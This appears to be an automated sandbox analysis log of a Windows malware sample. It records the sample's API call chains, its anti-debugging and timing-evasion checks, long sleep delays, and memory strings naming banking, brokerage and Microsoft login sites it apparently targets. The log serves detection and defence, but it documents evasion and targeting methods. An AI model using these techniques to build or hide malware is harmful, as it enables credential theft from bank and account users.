Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0024421F pushad ; retf 8_2_00244238
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0023425F push eax; ret 8_2_00234265
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_002342B0 push D4BE487Bh; retf 8_2_002342B6
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00240D5E push ecx; ret 8_2_00240D61
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00258F30 push edi; ret 8_2_00258F39
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00240F3A push eax; ret 8_2_00240F52
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0024B66D push ecx; iretd 8_2_0024B66E
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0024F8F5 push esp; ret 8_2_0024F8F9
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00247AB0 push esi; retf 8_2_00247ABA
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00814A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_00814A35
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008955FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_008955FD
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008333C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_008333C7
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\hkLFB22XxS.exe API/Special instruction interceptor: Address: 24431F4
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\convert.exe API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F7096E rdtsc 2_2_02F7096E
Source: C:\Windows\SysWOW64\convert.exe Window / User API: threadDelayed 5778 Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Window / User API: threadDelayed 4194 Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\hkLFB22XxS.exe API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\convert.exe API coverage: 2.5 %
Source: C:\Windows\SysWOW64\convert.exe TID: 1052 Thread sleep count: 5778 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe TID: 1052 Thread sleep time: -11556000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe TID: 1052 Thread sleep count: 4194 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe TID: 1052 Thread sleep time: -8388000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500 Thread sleep time: -75000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500 Thread sleep time: -38000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe TID: 5500 Thread sleep time: -51000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\convert.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00874696 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00874696
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_0087C9C7
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087C93C FindFirstFileW,FindClose, 1_2_0087C93C
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0087F200
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0087F35D
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0087F65E
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00873A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00873A2B
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00873D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00873D4E
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0087BF27
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_0024BB30 FindFirstFileW,FindNextFileW,FindClose, 8_2_0024BB30
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00814AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 1_2_00814AFE
Source: -16743.8.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: -16743.8.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: -16743.8.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: -16743.8.dr Binary or memory string: discord.comVMware20,11696487552f
Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ivebrokers.comVMware20,11696487552
Source: -16743.8.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: omVMware20,11696487552|UE
Source: -16743.8.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ive Brokers - GDCDYNVMware20,116
Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,1169648w
Source: -16743.8.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: -16743.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: -16743.8.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: -16743.8.dr Binary or memory string: global block list test formVMware20,11696487552
Source: -16743.8.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ivebrokers.co.inVMware20,11696487552~
Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11
Source: -16743.8.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: -16743.8.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: firefox.exe, 0000000B.00000002.2853412077.000002B6B18EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
Source: -16743.8.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: -16743.8.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: -16743.8.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: -16743.8.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: convert.exe, 00000008.00000002.4582079509.0000000007877000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,9
Source: -16743.8.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: -16743.8.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: -16743.8.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000002.4578311230.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: -16743.8.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: -16743.8.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: -16743.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: -16743.8.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: -16743.8.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: -16743.8.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: -16743.8.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: convert.exe, 00000008.00000002.4573809328.0000000002904000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: -16743.8.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: -16743.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: -16743.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: -16743.8.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\hkLFB22XxS.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\hkLFB22XxS.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F7096E rdtsc 2_2_02F7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004176E3 LdrLoadDll, 2_2_004176E3
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008841FD BlockInput, 1_2_008841FD
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00813B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_00813B4C
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00845CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00845CCC
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0088C304 LoadLibraryA,GetProcAddress, 1_2_0088C304
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_02443460 mov eax, dword ptr fs:[00000030h] 1_2_02443460
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_024434C0 mov eax, dword ptr fs:[00000030h] 1_2_024434C0
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_02441E70 mov eax, dword ptr fs:[00000030h] 1_2_02441E70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h] 2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h] 2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h] 2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03008324 mov eax, dword ptr fs:[00000030h] 2_2_03008324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03008324 mov ecx, dword ptr fs:[00000030h] 2_2_03008324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03008324 mov eax, dword ptr fs:[00000030h] 2_2_03008324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03008324 mov eax, dword ptr fs:[00000030h] 2_2_03008324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300634F mov eax, dword ptr fs:[00000030h] 2_2_0300634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h] 2_2_02F6E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h] 2_2_02F6E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h] 2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h] 2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h] 2_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h] 2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h] 2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h] 2_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h] 2_2_02F2826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h] 2_2_02F2A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h] 2_2_02F36259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h] 2_2_02FEA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h] 2_2_02FEA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h] 2_2_02FB8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h] 2_2_02FB8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h] 2_2_02F2823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h] 2_2_02F663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov ecx, dword ptr fs:[00000030h] 2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 2_2_02FDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h] 2_2_02FD43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h] 2_2_02FD43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h] 2_2_02FEC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h] 2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h] 2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h] 2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h] 2_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h] 2_2_02FB63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300625D mov eax, dword ptr fs:[00000030h] 2_2_0300625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h] 2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h] 2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h] 2_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h] 2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h] 2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h] 2_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h] 2_2_02F5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h] 2_2_02F5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h] 2_2_02FD437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h] 2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h] 2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h] 2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h] 2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h] 2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h] 2_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h] 2_2_02FFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h] 2_2_02FD8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
